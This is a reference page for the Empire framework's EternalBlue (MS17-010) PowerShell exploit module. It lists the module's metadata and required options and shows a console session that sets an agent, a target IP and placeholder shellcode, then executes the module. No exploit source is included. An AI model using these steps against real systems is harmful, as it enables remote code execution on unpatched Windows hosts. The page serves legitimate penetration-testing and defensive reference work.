Invoke-EternalBlue - Empire Module
This page contains detailed information about how to use the powershell/exploitation/exploit_eternalblue Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-EternalBlue
Module: powershell/exploitation/exploit_eternalblue
Source code [1]: empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
Source code [2]: empire/server/modules/powershell/exploitation/exploit_eternalblue.py
MITRE ATT&CK:
T1210
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No
Port of MS17_010 Metasploit module to powershell. Exploits targeted system and executes specified shellcode. Windows 7 and 2008 R2 supported. Potential for a BSOD.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the exploit_eternalblue module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the exploit_eternalblue module:
Agent
Agent to run module on.
InitialGrooms
Number of Initial Grooms.
Default value: 12
.
MaxAttempts
Number of times to try exploit (increment grooms by 5 each time).
Shellcode
Custom shellcode to inject, 0xaa,0xab,... format.
Target
IP or Hostname of target.
Exploit_eternalblue Example Usage
Here's an example of how to use the exploit_eternalblue module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/exploitation/exploit_eternalblue
Author Sean Dillon <sean.dillon [at] risksense.com>
Dylan Davis <dylan.davis [at] risksense.com>Equation Group
[email protected] (e0x70i)
Background False
Comments https://github.com/RiskSense-Ops/MS17-010
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternal
blue
http://threat.tevora.com/eternal-blues/
Description Port of MS17_010 Metasploit module to powershell. Exploits targeted
system and executes specified shellcode. Windows 7 and 2008 R2
supported. Potential for a BSOD
Language powershell
Name powershell/exploitation/exploit_eternalblue
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1210
,Record Options-,-------,----------,-----------------------------------,
| Name | Value | Required | Description |
|---------------|-------|----------|-----------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|-------|----------|-----------------------------------|
| InitialGrooms | 12 | True | Number of Initial Grooms |
|---------------|-------|----------|-----------------------------------|
| MaxAttempts | 1 | True | Number of times to try exploit |
| | | | (increment grooms by 5 each time) |
|---------------|-------|----------|-----------------------------------|
| Shellcode | | True | Custom shellcode to inject, |
| | | | 0xaa,0xab,... format. |
|---------------|-------|----------|-----------------------------------|
| Target | | True | IP or Hostname of target |
'---------------'-------'----------'-----------------------------------'
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set InitialGrooms 12
[*] Set InitialGrooms to 12
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set MaxAttempts value
[*] Set MaxAttempts to value
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Shellcode ..shellcode..
[*] Set Shellcode to ..shellcode..
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
- Sean Dillon
- Dylan Davis
Equation Group - [email protected] (e0x70i)
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_eternalblue.py
- https://github.com/RiskSense-Ops/MS17-010
- https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
- http://threat.tevora.com/eternal-blues/
- http://attack.mitre.org/techniques/T1210
See Also
Check also the following modules related to this module:
- powershell/exploitation/exploit_jenkins
- powershell/exploitation/exploit_jboss
- powershell/exploitation/invoke_spoolsample
- python/exploit/web/jboss_jmx
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.